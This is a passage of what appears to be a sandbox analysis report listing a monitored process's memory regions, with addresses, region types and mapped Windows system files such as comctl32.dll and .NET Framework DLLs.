monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 722
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 723
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 724
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 725
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 726
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 727
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 728
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 729
start_va = 0x76d0000
end_va = 0x76dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076d0000"
filename = ""
Region:
id = 730
start_va = 0x76e0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 731
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 732
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 733
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 734
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 735
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 736
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 737
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 738
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 739
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 740
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 741
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 742
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 743
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 744
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 745
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 746
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 747
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 748
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 749
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 750
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 751
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 752
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 753
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 754
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 755
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 756
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 757
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 758
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 759
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 760
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 761
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 762
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 763
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 764
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 765
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 766
start_va = 0x76d0000
end_va = 0x76dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076d0000"
filename = ""
Region:
id = 767
start_va = 0x76e0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 768
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 769
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 770
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 771
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 772
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 773
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 774
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 775
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 776
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 777
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 778
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 779
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 780
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 781
start_va = 0x76d0000
end_va = 0x76dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076d0000"
filename = ""
Region:
id = 782
start_va = 0x76e0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 783
start_va = 0x76f0000
end_va = 0x76fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076f0000"
filename = ""
Region:
id = 784
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 785
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 786
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 787
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 788
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 789
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 790
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 791
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 792
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 793
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 794
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 795
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 796
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 797
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 798
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 799
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 800
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 801
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 802
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 803
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 804
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 805
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 806
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 807
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 808
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 809
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 810
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 811
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 812
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 813
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 814
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 815
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 816
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 817
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 818
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 819
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 820
start_va = 0x76b0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 821
start_va = 0x76f0000
end_va = 0x77effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076f0000"
filename = ""
Region:
id = 822
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 823
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 824
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 825
start_va = 0x77f0000
end_va = 0x77fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000077f0000"
filename = ""
Region:
id = 826
start_va = 0x7800000
end_va = 0x780ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007800000"
filename = ""
Region:
id = 827
start_va = 0x7810000
end_va = 0x781ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007810000"
filename = ""
Region:
id = 828
start_va = 0x7820000
end_va = 0x782ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007820000"
filename = ""
Region:
id = 829
start_va = 0x7830000
end_va = 0x783ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 830
start_va = 0x7840000
end_va = 0x784ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007840000"
filename = ""
Region:
id = 831
start_va = 0x7850000
end_va = 0x785ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007850000"
filename = ""
Region:
id = 832
start_va = 0x7860000
end_va = 0x786ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007860000"
filename = ""
Region:
id = 833
start_va = 0x7870000
end_va = 0x787ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007870000"
filename = ""
Region:
id = 834
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 835
start_va = 0x7880000
end_va = 0x797ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007880000"
filename = ""
Region:
id = 836
start_va = 0x7450000
end_va = 0x7450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 837
start_va = 0x7980000
end_va = 0x89bffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 838
start_va = 0x77f0000
end_va = 0x77fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000077f0000"
filename = ""
Region:
id = 839
start_va = 0x7810000
end_va = 0x781ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007810000"
filename = ""
Region:
id = 840
start_va = 0x7800000
end_va = 0x780ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007800000"
filename = ""
Region:
id = 841
start_va = 0x7820000
end_va = 0x782ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007820000"
filename = ""
Region:
id = 842
start_va = 0x89c0000
end_va = 0x8a2bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisbi.ttf"
filename = "\\Windows\\Fonts\\seguisbi.ttf" (normalized: "c:\\windows\\fonts\\seguisbi.ttf")
Region:
id = 843
start_va = 0x7830000
end_va = 0x783ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 844
start_va = 0x7830000
end_va = 0x783ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 845
start_va = 0x8a30000
end_va = 0x8abefff
monitored = 0
entry_point = 0x8a3dd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 846
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 847
start_va = 0x8a30000
end_va = 0x8b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008a30000"
filename = ""
Region:
id = 848
start_va = 0x7840000
end_va = 0x7840fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007840000"
filename = ""
Region:
id = 849
start_va = 0x8a30000
end_va = 0x8aebfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008a30000"
filename = ""
Region:
id = 850
start_va = 0x8b80000
end_va = 0x8b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b80000"
filename = ""
Region:
id = 851
start_va = 0x7840000
end_va = 0x7843fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007840000"
filename = ""
Region:
id = 852
start_va = 0x7850000
end_va = 0x7853fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007850000"
filename = ""
Region:
id = 853
start_va = 0x8af0000
end_va = 0x8b7efff
monitored = 0
entry_point = 0x8afdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 854
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 855
start_va = 0x8af0000
end_va = 0x8b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 856
start_va = 0x8af0000
end_va = 0x8b7efff
monitored = 0
entry_point = 0x8afdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 857
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 858
start_va = 0x8af0000
end_va = 0x8c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 859
start_va = 0x8af0000
end_va = 0x8b7efff
monitored = 0
entry_point = 0x8afdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 860
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 861
start_va = 0x8af0000
end_va = 0x8ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 866
start_va = 0x7860000
end_va = 0x786dfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007860000"
filename = ""
Region:
id = 867
start_va = 0x8af0000
end_va = 0x8afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 868
start_va = 0x8af0000
end_va = 0x8afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 869
start_va = 0x8b00000
end_va = 0x8b0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b00000"
filename = ""
Region:
id = 870
start_va = 0x8b10000
end_va = 0x8b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b10000"
filename = ""
Region:
id = 871
start_va = 0x8b20000
end_va = 0x8b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b20000"
filename = ""
Region:
id = 872
start_va = 0x8b30000
end_va = 0x8b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b30000"
filename = ""
Region:
id = 873
start_va = 0x8b40000
end_va = 0x8b4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b40000"
filename = ""
Region:
id = 874
start_va = 0x8b50000
end_va = 0x8b5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b50000"
filename = ""
Region:
id = 875
start_va = 0x8b60000
end_va = 0x8b6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b60000"
filename = ""
Region:
id = 876
start_va = 0x8b70000
end_va = 0x8b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b70000"
filename = ""
Region:
id = 877
start_va = 0x8b80000
end_va = 0x8b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b80000"
filename = ""
Region:
id = 878
start_va = 0x8b90000
end_va = 0x8b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b90000"
filename = ""
Region:
id = 879
start_va = 0x8ba0000
end_va = 0x8baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ba0000"
filename = ""
Region:
id = 880
start_va = 0x8bb0000
end_va = 0x8bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008bb0000"
filename = ""
Region:
id = 881
start_va = 0x8af0000
end_va = 0x8afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 882
start_va = 0x6a730000
end_va = 0x6a737fff
monitored = 1
entry_point = 0x6a733809
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll")
Region:
id = 883
start_va = 0x8b00000
end_va = 0x8b00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008b00000"
filename = ""
Region:
id = 884
start_va = 0x8b00000
end_va = 0x8b53fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll")
Region:
id = 885
start_va = 0x6a5c0000
end_va = 0x6a732fff
monitored = 0
entry_point = 0x6a66d220
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll")
Region:
id = 886
start_va = 0x8b80000
end_va = 0x8bfdfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b80000"
filename = ""
Region:
id = 887
start_va = 0x8c00000
end_va = 0x8c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008c00000"
filename = ""
Region:
id = 888
start_va = 0x8c00000
end_va = 0x8c0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c00000"
filename = ""
Region:
id = 889
start_va = 0x8c10000
end_va = 0x8c1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c10000"
filename = ""
Region:
id = 890
start_va = 0x8c20000
end_va = 0x8c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c20000"
filename = ""
Region:
id = 891
start_va = 0x8b60000
end_va = 0x8b6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b60000"
filename = ""
Region:
id = 892
start_va = 0x8c30000
end_va = 0x8cb5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c30000"
filename = ""
Region:
id = 893
start_va = 0x8cc0000
end_va = 0x8ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 894
start_va = 0x8cd0000
end_va = 0x8cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cd0000"
filename = ""
Region:
id = 895
start_va = 0x8ce0000
end_va = 0x8ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 896
start_va = 0x8cf0000
end_va = 0x8cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cf0000"
filename = ""
Region:
id = 897
start_va = 0x8ce0000
end_va = 0x8ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 898
start_va = 0x8cf0000
end_va = 0x8cfffff
monitored = 1
